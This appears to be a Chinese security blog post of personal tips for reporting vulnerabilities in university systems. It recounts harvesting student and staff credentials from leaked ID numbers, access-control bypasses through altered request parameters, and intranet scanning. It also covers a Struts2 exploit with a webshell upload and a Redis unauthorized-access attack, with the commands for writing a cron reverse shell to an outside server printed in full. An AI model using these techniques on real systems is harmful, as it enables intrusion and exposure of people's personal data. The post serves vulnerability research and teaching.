经验分享 | 一些个人的edusrc小白经验

2022-09-29 20:34:49 浏览数 (1)

这是F12sec的第66篇原创

申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!

ps:本文来自团队师傅白龙哥哥,转载请注明来源。

1.挖掘姿势

第一阶段开始那自然是信息收集

有账号进到系统里测试比较容易测出漏洞。

所以先找到账号,学号很好找,关键是密码,密码有很多学校是使用身份证后六位,找密码也分成两种方式:

一种是泄露部分的身份证后几位,然后通过爆破测出密码;另一种是固定的默 认密码

举个第二种的例子

百度语法挑选合适的目标 site:.edu.cn 默认密码 找到一个挺不错的。

可以进这个系统看看有没有更多的信息进一步信息收集。

然后就是找留学生的学号了,可以去有关国际的学院找学号了 或者百度语法site:xxx.edu.cn 留学生 学号 还可以加点限定词方便找到自由发挥 我用找到的留学生学号登录系统。

没啥有用信息 但是看到url中的userid,想着改一下参数值能不能越权到其他账号,结果还真可以

收集到的信息就多了起来,这也算信息泄露 越权了,有身份证就可以登录其它系统看看了。这里就不继续下去了。

第二阶段就是有了可以登录的账号登陆门户进入更多的系统测试。

登录门户后能测试的站点也多了,具体怎么测试还得看是什么系统。

我也是举个例子 以学生权限登录,进到门户我是想着挖一些信息泄露顺便看看能不能找到其他账号。

比如老师或者研究 生,因为多个研究生系统可以进 在办公系统的一处发送消息可以选择对象,选择对象似乎有全校师生的学号和工号,一看都是学号,但是按账号排序后出现大量身份证和姓名,也算个信息泄露了 有了这个就差学号或者工号就可以组合成新的账户登录。

本来还想着爆破的,但是在另一个系统里居然还有个查询人员的功能

于是通过之前得到的教师姓名查询,果然能查到工号

然后工号和身份证组合成新账户登录,也能成功登录到教师权限的账号,没想到还有登录研究生系统的权限

点击右上角可以切换角色,这时候抓包修改数据可以越权到管理员权限

修改成1后放包后就到管理员身份了

第三阶段就是登录SSLVPN进内网

进入内网一开始还是信息收集,主要是收集网段信息,找到存活站点 确定网段可以翻翻百度谷歌语有时候还是能找到有用信息,比如

语法也是site:.xxx.edu.cn 内网(或者用内网网段开头例如192.168)

也可以用子域名挖掘机看看子域名,有时候也会返回内网ip。

如果收集不到网段信息就只能遍历扫内网网段了

确定网段后就可以利用工具扫描C段或者B段,扫描的端口看个人习惯设置 扫出站点后就可以测了,有些地方内网安全意识比较薄弱,大意了就可能会存在一些比较不应该的漏洞,就可以上一些漏扫工具。

比如goby,顺便说一下goby有一个比较方便的功能能看站点页面截图

可以看看扫出来的站点主页面是什么样的方便选择.

举几个例子在内网遇到的漏洞 1、一个是用goby扫出个struts2的漏洞直接上工具

权限一上来就是最高权限,目录也出来了直接传个哥斯拉马

连接就行了

2、密码重置

发现一个系统

手工测了一波弱口令找不到密码,然后注册用户时输入admin显示占用,那就到找回密码出有没有什么突破口 看到找回密码的问题是我的名字

我返回到上面账号验证那步输入好用户名和验证码后开启抓包,放包到下图这个包时看到有个getxinxibyuserid,然后发送到重发包

巧了这时候能看到管理员的信息 里面正好有个XingMing,和我一样是拼音佬

在密保问题里赶紧写上然后找回密码,但是结果是重置的密码发到邮箱里了于是重来了一遍到这个包时看到Email,改成自己的邮箱然后放包,但是一直没有收到邮件好像没有用

但是转念一下密码重置了应该会是默认的然后试了一下弱口令发现admin/123456登陆成功

3、redis未授权计划任务反弹shell

用工具扫描网段时看到有个ip开了6379端口,马上想到了redis未授权漏洞

赶紧到github下了个redis连接工具,连上之后get dir了一下能执行,看起来有戏

代码语言:javascript复制
连接:redis-cli -h ip
获取路径:get dir

在自己的有公网ip的服务器上监听端口

代码语言:javascript复制
nc -lvvnp 8888

顺便提一下一般是-lvp就行了但是我这个阿里云的服务器会报错,百度了一下加了个参数n就可以了

继续回到redis连接上,将反弹shell语句写入参数x,x是自己设置的 然后修改目录为计划任务目录修改文件名为root然后保存

代码语言:javascript复制
set xx "n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1n" (ip写自己服务器的ip,端口写
自己监听的端口)
config set dir /var/spool/cron/
config set dbfilename root
save

过了一分钟左右vps就来shell了

这个测完记得把弹shell的计划任务删了

代码语言:javascript复制
crontab -l

可以查看计划任务

代码语言:javascript复制
crontab -e

可以修改计划任务

我是检查/var/spool/cron/root文件内容是否只有我写的计划任务

代码语言:javascript复制

nc -lvvnp 8888
set xx "n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1n" (ip写自己服务器的ip,端口写
自己监听的端口)
config set dir /var/spool/cron/
config set dbfilename root
save

确认无误后我就把文件删除了 最后再crontab -l检查一下

0 人点赞